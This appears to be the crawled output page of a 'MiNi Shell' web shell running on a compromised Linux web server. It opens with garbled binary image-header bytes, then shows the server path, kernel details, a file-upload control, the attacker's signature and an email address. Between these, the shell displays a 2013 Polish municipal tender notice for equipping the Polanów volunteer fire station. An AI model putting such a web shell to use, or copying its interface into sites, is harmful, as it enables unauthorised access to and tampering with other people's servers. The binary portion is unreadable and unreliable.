JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130726/298276-N-2013.html

<p class="kh_header"><b>Polanów: Zakup wyposażenia do budynku remizy Ochotniczej Straży Pożarnej w Polanowie</b><br>
<b>Numer ogłoszenia: 298276 - 2013; data zamieszczenia: 26.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Polanów , ul. Wolności 4, 76-010 Polanów, woj. zachodniopomorskie, tel. 094 3188351, 3480641, faks 094 3188387.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polanow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wyposażenia do budynku remizy Ochotniczej Straży Pożarnej w Polanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup wyposażenia do budynku remizy Ochotniczej Straży Pożarnej w Polanowie. 
Zakres prac obejmuje
Zadanie A	Dostawa mebli
1.Biurko120x60xh=75 (płyta laminowana grubości 18 mm, szuflada, szafeczka, półka na klawiaturę, półki na drukarkę oraz komputer, kolor ciemny orzech)	1 szt.
2.Fotel obrotowy typu PRESTIGE (szerokość do 60 cm, głębokość do 70 cm, wysokość 105÷118 cm, materiał eco skóra,)	6 szt.
3.Regał z drzwiami (wymiary 80 x 42 x 200, kolor ciemny orzech, płyta o grubości 18 mm, 5 półek zamkniętych, 4 otwarte oraz 2 szuflady)	2 szt.
4.Szafa na ubrania dwudrzwiowa typu BHP, metalowa, malowana proszkowo, czerwone drzwi, szare boki, na nóżkach, z półką  o wymiarach,wysokość (bez nóżek) 1800 mm, szerokość 800 mm, głębokość 500 mm,	20 szt.
5.Biurko do kawiarenki internetowej (z wysuwką na klawiaturę i miejscem na stację dysków i UPS 120x60xh=75 kolor ciemny orzech 4szt.
6.Krzesło konferencyjne typu ISO lub RIO (tapicerowane siedzenia, wykonane z trwałego metalowego stelażu)	 70szt.
7.Stół do świetlicy (wymiary 80x80x75, stelaż metalowy, blat z płyty laminowanej, grubości ok. 25 mm, kolor ciemny orzech)	10 szt.
8.Kuchenka mikrofalowa  grill, podgrzewanie, 20l, 1000 W, kolor biały 1szt.
9.Chłodziarko zamrażarka 45x140x54 cm, temperatura zamrażarki 18°C,                 
Parametry techniczne, klasa energetyczna A, zasilanie 230V 50Hz, zużycie energii elektrycznej 0,6 kWh/24 h, kolor biały 1szt.
10.Kuchenka elektryczna, Klasa energetyczna A, pojemność piekarnika 55 l, rodzaj płyty ceramiczna, szerokość 50 cm, kolor biały)	 1 szt.
11.Czajnik elektryczny, moc2400 W, pojemność 1,7 l, kolorystyka biały,  płaska grzałka płytowa ze stali szlachetnej, filtr zatrzymujący osady, podstawka obrotowa.	 1szt.
12.Fotel typu FINKA (materiał tkanina, kolor ciemny, kolor drewna ciemny orzech, wymiary 65 x 105 x 65	2szt.
13.Kanapa w komplecie do foteli (materiał tkanina, kolor ciemny, kolor drewna ciemny orzech, wymiary 200 x 80 x 95)	1szt.
14.Ława (wymiary 120x60x55, płyta laminowana, kolor ciemny orzech)	1szt.
15.Biurko komputerowe w kształcie litery L 170x180xh=75 z wysuwką na klawiaturę i miejscem na stacje dysków(płyta laminowana grubość 18 mm, klawiatura na prowadnicach rolkowych, duża szafka przesuwna, kolor ciemny orzech)	1 szt.
16.Stół konferencyjny (wymiary220x120xh=75, grubość blatu 85 mm, kolor ciemny orzech, blat laminowany o grubości 25mm)	1szt.
17.Stojak (regał) (kolor szary, wykonany z metalu,  głębokości regałów 400,mm, wysokości regałów 2000mm,)	15mb
Zadanie B	Dostawa sprzętu  komputerowego
1.Komputer
Procesor
Typ x86_64
Co najmniej dwurdzeniowy
Pamięć RAM	
Minimum 4 GB (DDR-3)
Płyta główna      
Chipset rekomendowany przez producenta oferowanego procesora
Dysk twardy
Transfer nie mniejszy niż oferowany przez standard SATA II  
Pojemność minimum 320GB
Karta grafiki	
Pamięć graficzna min 512 MB
Karta telewizyjna jakości HD
System dźwiękowy	
Karta dźwiękowa zintegrowana z płytą główną
Porty wejścia/wyjścia	
Dostępne z przodu obudowy komputera
Min 1 port USB 3
Minimum 2 porty USB 2.0 lub wyższy
Gniazdo wyjścia słuchawek
Gniazdo wejścia mikrofonu
Dostępne z  tyłu obudowy komputera
Minimum 6 portów USB 2.0 lub nowszy
Minimum 1 port transmisji równoległej
Minimum 1 gniazdo wejścia/wyjścia audio
Minimum 1 port interfejsu sieciowego RJ-45
Interfejs sieciowy
Karta sieciowa zintegrowana 100/1000, gniazdo RJ-45
Napędy optyczne
wewnętrzny,  czytnik DVD 
Klawiatura	
Standardowa klawiatura w układzie US
Trwałe oznaczenie logo producenta komputera
Urządzenie wskazujące (Mysz)	
dwuprzyciskowa mysz optyczna USB z przewijaniem (rolką), podkładka pod mysz
Trwałe oznaczenie logo producenta komputera
Obudowa	
Miniwieża fabrycznie przygotowana do pracy w pionie i poziomie
Trwałe oznaczenie logo producenta komputera
Bezpieczeństwo	
Możliwość startu komputera z urządzeń podłączanych przez port USB,
Poziom emitowanego hałasu 	
Wg norm ISO 7779 i  9296
Nie więcej niż 25 dB w normalnym trybie pracy (z pracującym dyskiem, bez napędów optycznych) 
Zarządzanie energią
Tak
System operacyjny	
MS Windows 7  lub nowszy
Preinstalowany fabrycznie przez producenta komputera,
Zawierający wszystkie niezbędne do prawidłowego działania komputera  sterowniki.
Certyfikaty
Certyfikat ISO 9001,2000  i 14001  lub równoważny dla producenta komputera na proces projektowania i produkcji oferowanego sprzętu,
Certyfikat lub deklaracja zgodności CE dla oferowanego sprzętu,
Certyfikat lub deklaracja zgodności komputera z normą Energy Star 4.0 lub wyższy
Certyfikat dla komputera potwierdzający wymagany poziom hałasu dla oferowanego modelu komputera zgodny z normami ISO 7779 i 9296 lub równoważny
Kopie zainstalowanego oprogramowania
Kopia preinstalowanego systemu operacyjnego oraz dodatkowego oprogramowania  na płytach lub oprogramowanie umożliwiające przygotowanie w/w płyt na nośnikach opracowane przez producenta oferowanego sprzętu, umożliwiające odtworzenie do poziomu preinstalowanego.
Części zamienne	
Dostępność oryginalnych części zamiennych przez okres min. 2 lat po upływie gwarancji 
Dokumentacja	
Dokumentacja techniczna standardowa dla każdego zestawu
Oprogramowanie użytkowe	
Microsoft Office 2007 lub 2010 PL (z licencją i nośnikiem instalacyjnym) 
Program antywirusowy 
Gwarancja 	
Minimum 24 miesiące od daty dostawy.
Serwis wykonywany w siedzibie zamawiającego z czasem reakcji w następnym dniu roboczym.
Serwisowanie całego zestawu łącznie z monitorem przez ten sam podmiot.	4
2.Monitor 22 cale, HD 16,10  4xUSB DVI-D DP z głośnikami wbudowanymi lub zewnętrznymi	4 szt.
3.Urządzenie wielofunkcyjne (skaner, drukarka, kopiarka, technologia laserowa, max rozmiar nośnika A4)	1 szt.
Zadania C 	Dostawa pozostałego  wyposażenia
1.Środki łączności (radiotelefon przenośny, 255 kanałów, wyświetlacz, klawiatura, pasmo VHF lub UHF) z homologacją.	 2szt.
2.Fantom do ćwiczeń ze wskaźnikiem informującym o prawidłowości częstotliwości uciśnięć RKO/AED, sygnał dźwiękowy	1szt.
3.Automatyczny defibrylator AED z monitorem zasilanie sieciowe, akumulatorowe, wstrząsoodporny	1szt.
4.Agregat prądotwórczy z przyczepką (z hamulcem najazdowym) dopuszczona do ruchu. Silnik spalinowy wysokoprężny z prądnicą, moc min. ciągła 22kVA/17/6 kW. Plandeka kolor czerwony 1 kpl
Elementami składowymi przedmiotu zamówienia są także wszelkie roboty i usługi towarzyszące realizacji robót, o których mowa w pkt 1 Rozdziału III SIWZ, w szczególności koszty uzyskania niezbędnych badań, opinii i uzgodnień (jeżeli dotyczy) zużycia energii elektrycznej, ubezpieczenie, zabezpieczenie placu budowy, rozruchu, przeszkolenia wskazanych pracowników urzędu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 30.21.30.00-5, 31.12.20.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości
Zadanie A - 1000,00zł 
Zadanie B - 400,00zł.
Zadanie C - 1400,00zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają opłaconą polisę OC. Wymagana suma ubezpieczenia nie mniejsza niż 50 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust.1 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmiany w formie aneksów w niej wymienionych w przypadkach:
- zmiana w kolejności i terminach dostawy,
Zmiany rzutujące na termin wykonania umowy
-możliwe jest przedłużenie terminu zakończenia umowy o czas opóźnienia, jeżeli opóźnienie to wynika z przyczyn leżących po stronie Zamawiającego i jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy, w zakresie następujących  obowiązków Zamawiającego:
a) przekazania terenu budowy,
b) przekazanie dokumentów budowy.
Możliwa jest zmiana terminu wykonania umowy, ewentualne wstrzymanie /wznowienie dostaw, ze względu na:
a)oczekiwanie Wykonawcy na niezbędne opinie, decyzje administracyjne (opóźnienie spowodowane przez władze odpowiednich instytucji),
b)przedłużenie procedury przetargowej,
c)uwarunkowania społeczne (protesty, listy, petycje, itp.),
d)dostawy dodatkowe,
e)technologie wykonania robót,
f)zmianę stanu prawnego,
g)warunki geotechniczne, których nie można było przewidzieć,
h)szczególnie niesprzyjające warunki atmosferyczne,
i) działania sił natury, uznane za stan klęski żywiołowej,
Wykonawca nie będzie miał prawa do przedłużenia terminu zakończenia umowy
jeżeli  przedłużenie terminu wynika z przyczyn leżących  po stronie Wykonawcy.
Zmiany rzutujące na wynagrodzenie:
Możliwa jest zmiana postanowienia umowy w związku:
a) ze zmianą stawki podatku od towarów i usług (VAT),
b) obniżeniem kosztu dostawy a tym samym wynagrodzenia,
c) Wykonawcy ze względu na rezygnację z części robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Polanowie
ul. Wolności 4
76-010 Polanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2013 godzina 10:00, miejsce: Urząd Miejski w Polanowie
ul. Wolności 4
76-010 Polanów - pokój nr 5 (sekretariat Urzędu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja jest współfinansowana ze środków Unii Europejskiej w ramach  Programu  Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013r. w ramach środka 4.1. Rozwój obszarów zależnych od rybactwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com